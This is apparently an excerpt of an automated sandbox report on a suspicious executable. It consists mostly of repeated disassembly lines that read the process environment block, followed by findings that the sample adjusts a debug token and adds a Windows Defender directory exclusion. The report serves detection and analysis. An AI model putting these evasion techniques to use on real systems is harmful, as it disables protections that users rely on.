                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0187A6C7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A6C7 mov eax, dword ptr fs:[00000030h]5_2_0187A6C7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE6F2 mov eax, dword ptr fs:[00000030h]5_2_018BE6F2
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE6F2 mov eax, dword ptr fs:[00000030h]5_2_018BE6F2
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE6F2 mov eax, dword ptr fs:[00000030h]5_2_018BE6F2
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE6F2 mov eax, dword ptr fs:[00000030h]5_2_018BE6F2
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C06F1 mov eax, dword ptr fs:[00000030h]5_2_018C06F1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C06F1 mov eax, dword ptr fs:[00000030h]5_2_018C06F1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE609 mov eax, dword ptr fs:[00000030h]5_2_018BE609
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185260B mov eax, dword ptr fs:[00000030h]5_2_0185260B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882619 mov eax, dword ptr fs:[00000030h]5_2_01882619
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185E627 mov eax, dword ptr fs:[00000030h]5_2_0185E627
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01876620 mov eax, dword ptr fs:[00000030h]5_2_01876620
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01878620 mov eax, dword ptr fs:[00000030h]5_2_01878620
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184262C mov eax, dword ptr fs:[00000030h]5_2_0184262C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185C640 mov eax, dword ptr fs:[00000030h]5_2_0185C640
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A660 mov eax, dword ptr fs:[00000030h]5_2_0187A660
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A660 mov eax, dword ptr fs:[00000030h]5_2_0187A660
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01872674 mov eax, dword ptr fs:[00000030h]5_2_01872674
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190866E mov eax, dword ptr fs:[00000030h]5_2_0190866E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190866E mov eax, dword ptr fs:[00000030h]5_2_0190866E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018409AD mov eax, dword ptr fs:[00000030h]5_2_018409AD
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018409AD mov eax, dword ptr fs:[00000030h]5_2_018409AD
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C89B3 mov esi, dword ptr fs:[00000030h]5_2_018C89B3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C89B3 mov eax, dword ptr fs:[00000030h]5_2_018C89B3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C89B3 mov eax, dword ptr fs:[00000030h]5_2_018C89B3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190A9D3 mov eax, dword ptr fs:[00000030h]5_2_0190A9D3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D69C0 mov eax, dword ptr fs:[00000030h]5_2_018D69C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A9D0 mov eax, dword ptr fs:[00000030h]5_2_0184A9D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A9D0 mov eax, dword ptr fs:[00000030h]5_2_0184A9D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A9D0 mov eax, dword ptr fs:[00000030h]5_2_0184A9D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A9D0 mov eax, dword ptr fs:[00000030h]5_2_0184A9D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A9D0 mov eax, dword ptr fs:[00000030h]5_2_0184A9D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A9D0 mov eax, dword ptr fs:[00000030h]5_2_0184A9D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018749D0 mov eax, dword ptr fs:[00000030h]5_2_018749D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CE9E0 mov eax, dword ptr fs:[00000030h]5_2_018CE9E0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018729F9 mov eax, dword ptr fs:[00000030h]5_2_018729F9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018729F9 mov eax, dword ptr fs:[00000030h]5_2_018729F9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE908 mov eax, dword ptr fs:[00000030h]5_2_018BE908
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BE908 mov eax, dword ptr fs:[00000030h]5_2_018BE908
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01838918 mov eax, dword ptr fs:[00000030h]5_2_01838918
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01838918 mov eax, dword ptr fs:[00000030h]5_2_01838918
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CC912 mov eax, dword ptr fs:[00000030h]5_2_018CC912
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C892A mov eax, dword ptr fs:[00000030h]5_2_018C892A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D892B mov eax, dword ptr fs:[00000030h]5_2_018D892B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C0946 mov eax, dword ptr fs:[00000030h]5_2_018C0946
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01866962 mov eax, dword ptr fs:[00000030h]5_2_01866962
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01866962 mov eax, dword ptr fs:[00000030h]5_2_01866962
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01866962 mov eax, dword ptr fs:[00000030h]5_2_01866962
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0188096E mov eax, dword ptr fs:[00000030h]5_2_0188096E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0188096E mov edx, dword ptr fs:[00000030h]5_2_0188096E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0188096E mov eax, dword ptr fs:[00000030h]5_2_0188096E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CC97C mov eax, dword ptr fs:[00000030h]5_2_018CC97C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E4978 mov eax, dword ptr fs:[00000030h]5_2_018E4978
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E4978 mov eax, dword ptr fs:[00000030h]5_2_018E4978
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840887 mov eax, dword ptr fs:[00000030h]5_2_01840887
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CC89D mov eax, dword ptr fs:[00000030h]5_2_018CC89D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E8C0 mov eax, dword ptr fs:[00000030h]5_2_0186E8C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190A8E4 mov eax, dword ptr fs:[00000030h]5_2_0190A8E4
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C8F9 mov eax, dword ptr fs:[00000030h]5_2_0187C8F9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C8F9 mov eax, dword ptr fs:[00000030h]5_2_0187C8F9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CC810 mov eax, dword ptr fs:[00000030h]5_2_018CC810
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01862835 mov eax, dword ptr fs:[00000030h]5_2_01862835
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01862835 mov eax, dword ptr fs:[00000030h]5_2_01862835
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01862835 mov eax, dword ptr fs:[00000030h]5_2_01862835
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01862835 mov ecx, dword ptr fs:[00000030h]5_2_01862835
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01862835 mov eax, dword ptr fs:[00000030h]5_2_01862835
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01862835 mov eax, dword ptr fs:[00000030h]5_2_01862835
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E483A mov eax, dword ptr fs:[00000030h]5_2_018E483A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E483A mov eax, dword ptr fs:[00000030h]5_2_018E483A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A830 mov eax, dword ptr fs:[00000030h]5_2_0187A830
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01870854 mov eax, dword ptr fs:[00000030h]5_2_01870854
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01844859 mov eax, dword ptr fs:[00000030h]5_2_01844859
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01844859 mov eax, dword ptr fs:[00000030h]5_2_01844859
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D6870 mov eax, dword ptr fs:[00000030h]5_2_018D6870
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D6870 mov eax, dword ptr fs:[00000030h]5_2_018D6870
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CE872 mov eax, dword ptr fs:[00000030h]5_2_018CE872
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CE872 mov eax, dword ptr fs:[00000030h]5_2_018CE872
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850BBE mov eax, dword ptr fs:[00000030h]5_2_01850BBE
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850BBE mov eax, dword ptr fs:[00000030h]5_2_01850BBE
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F4BB0 mov eax, dword ptr fs:[00000030h]5_2_018F4BB0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F4BB0 mov eax, dword ptr fs:[00000030h]5_2_018F4BB0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840BCD mov eax, dword ptr fs:[00000030h]5_2_01840BCD
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840BCD mov eax, dword ptr fs:[00000030h]5_2_01840BCD
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840BCD mov eax, dword ptr fs:[00000030h]5_2_01840BCD
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01860BCB mov eax, dword ptr fs:[00000030h]5_2_01860BCB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01860BCB mov eax, dword ptr fs:[00000030h]5_2_01860BCB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01860BCB mov eax, dword ptr fs:[00000030h]5_2_01860BCB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EEBD0 mov eax, dword ptr fs:[00000030h]5_2_018EEBD0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01848BF0 mov eax, dword ptr fs:[00000030h]5_2_01848BF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01848BF0 mov eax, dword ptr fs:[00000030h]5_2_01848BF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01848BF0 mov eax, dword ptr fs:[00000030h]5_2_01848BF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186EBFC mov eax, dword ptr fs:[00000030h]5_2_0186EBFC
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CCBF0 mov eax, dword ptr fs:[00000030h]5_2_018CCBF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BEB1D mov eax, dword ptr fs:[00000030h]5_2_018BEB1D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186EB20 mov eax, dword ptr fs:[00000030h]5_2_0186EB20
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186EB20 mov eax, dword ptr fs:[00000030h]5_2_0186EB20
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01908B28 mov eax, dword ptr fs:[00000030h]5_2_01908B28
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01908B28 mov eax, dword ptr fs:[00000030h]5_2_01908B28
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F4B4B mov eax, dword ptr fs:[00000030h]5_2_018F4B4B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F4B4B mov eax, dword ptr fs:[00000030h]5_2_018F4B4B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E8B42 mov eax, dword ptr fs:[00000030h]5_2_018E8B42
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D6B40 mov eax, dword ptr fs:[00000030h]5_2_018D6B40
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D6B40 mov eax, dword ptr fs:[00000030h]5_2_018D6B40
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190AB40 mov eax, dword ptr fs:[00000030h]5_2_0190AB40
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EEB50 mov eax, dword ptr fs:[00000030h]5_2_018EEB50
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183CB7E mov eax, dword ptr fs:[00000030h]5_2_0183CB7E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184EA80 mov eax, dword ptr fs:[00000030h]5_2_0184EA80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184EA80 mov eax, dword ptr fs:[00000030h]5_2_0184EA80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184EA80 mov eax, dword ptr fs:[00000030h]5_2_0184EA80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184EA80 mov eax, dword ptr fs:[00000030h]5_2_0184EA80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184EA80 mov eax, dword ptr fs:[00000030h]5_2_0184EA80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184EA80 mov eax, dword ptr fs:[00000030h]5_2_0184EA80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184EA80 mov eax, dword ptr fs:[00000030h]5_2_0184EA80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184EA80 mov eax, dword ptr fs:[00000030h]5_2_0184EA80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184EA80 mov eax, dword ptr fs:[00000030h]5_2_0184EA80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01914A80 mov eax, dword ptr fs:[00000030h]5_2_01914A80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01878A90 mov edx, dword ptr fs:[00000030h]5_2_01878A90
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01848AA0 mov eax, dword ptr fs:[00000030h]5_2_01848AA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01848AA0 mov eax, dword ptr fs:[00000030h]5_2_01848AA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01896AA4 mov eax, dword ptr fs:[00000030h]5_2_01896AA4
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01896ACC mov eax, dword ptr fs:[00000030h]5_2_01896ACC
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01896ACC mov eax, dword ptr fs:[00000030h]5_2_01896ACC
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01896ACC mov eax, dword ptr fs:[00000030h]5_2_01896ACC
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840AD0 mov eax, dword ptr fs:[00000030h]5_2_01840AD0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01874AD0 mov eax, dword ptr fs:[00000030h]5_2_01874AD0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01874AD0 mov eax, dword ptr fs:[00000030h]5_2_01874AD0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187AAEE mov eax, dword ptr fs:[00000030h]5_2_0187AAEE
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187AAEE mov eax, dword ptr fs:[00000030h]5_2_0187AAEE
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CCA11 mov eax, dword ptr fs:[00000030h]5_2_018CCA11
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187CA24 mov eax, dword ptr fs:[00000030h]5_2_0187CA24
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186EA2E mov eax, dword ptr fs:[00000030h]5_2_0186EA2E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01864A35 mov eax, dword ptr fs:[00000030h]5_2_01864A35
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01864A35 mov eax, dword ptr fs:[00000030h]5_2_01864A35
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187CA38 mov eax, dword ptr fs:[00000030h]5_2_0187CA38
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01846A50 mov eax, dword ptr fs:[00000030h]5_2_01846A50
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01846A50 mov eax, dword ptr fs:[00000030h]5_2_01846A50
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01846A50 mov eax, dword ptr fs:[00000030h]5_2_01846A50
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01846A50 mov eax, dword ptr fs:[00000030h]5_2_01846A50
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01846A50 mov eax, dword ptr fs:[00000030h]5_2_01846A50
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01846A50 mov eax, dword ptr fs:[00000030h]5_2_01846A50
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01846A50 mov eax, dword ptr fs:[00000030h]5_2_01846A50
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850A5B mov eax, dword ptr fs:[00000030h]5_2_01850A5B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850A5B mov eax, dword ptr fs:[00000030h]5_2_01850A5B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187CA6F mov eax, dword ptr fs:[00000030h]5_2_0187CA6F
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187CA6F mov eax, dword ptr fs:[00000030h]5_2_0187CA6F
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187CA6F mov eax, dword ptr fs:[00000030h]5_2_0187CA6F
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EEA60 mov eax, dword ptr fs:[00000030h]5_2_018EEA60
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BCA72 mov eax, dword ptr fs:[00000030h]5_2_018BCA72
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BCA72 mov eax, dword ptr fs:[00000030h]5_2_018BCA72
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01876DA0 mov eax, dword ptr fs:[00000030h]5_2_01876DA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187CDB1 mov ecx, dword ptr fs:[00000030h]5_2_0187CDB1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187CDB1 mov eax, dword ptr fs:[00000030h]5_2_0187CDB1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187CDB1 mov eax, dword ptr fs:[00000030h]5_2_0187CDB1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01868DBF mov eax, dword ptr fs:[00000030h]5_2_01868DBF
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01868DBF mov eax, dword ptr fs:[00000030h]5_2_01868DBF
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01914DAD mov eax, dword ptr fs:[00000030h]5_2_01914DAD
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01908DAE mov eax, dword ptr fs:[00000030h]5_2_01908DAE
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01908DAE mov eax, dword ptr fs:[00000030h]5_2_01908DAE
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186EDD3 mov eax, dword ptr fs:[00000030h]5_2_0186EDD3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186EDD3 mov eax, dword ptr fs:[00000030h]5_2_0186EDD3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C4DD7 mov eax, dword ptr fs:[00000030h]5_2_018C4DD7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C4DD7 mov eax, dword ptr fs:[00000030h]5_2_018C4DD7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184ADE0 mov eax, dword ptr fs:[00000030h]5_2_0184ADE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184ADE0 mov eax, dword ptr fs:[00000030h]5_2_0184ADE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184ADE0 mov eax, dword ptr fs:[00000030h]5_2_0184ADE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184ADE0 mov eax, dword ptr fs:[00000030h]5_2_0184ADE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184ADE0 mov eax, dword ptr fs:[00000030h]5_2_0184ADE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184ADE0 mov eax, dword ptr fs:[00000030h]5_2_0184ADE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01860DE1 mov eax, dword ptr fs:[00000030h]5_2_01860DE1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183CDEA mov eax, dword ptr fs:[00000030h]5_2_0183CDEA
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183CDEA mov eax, dword ptr fs:[00000030h]5_2_0183CDEA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
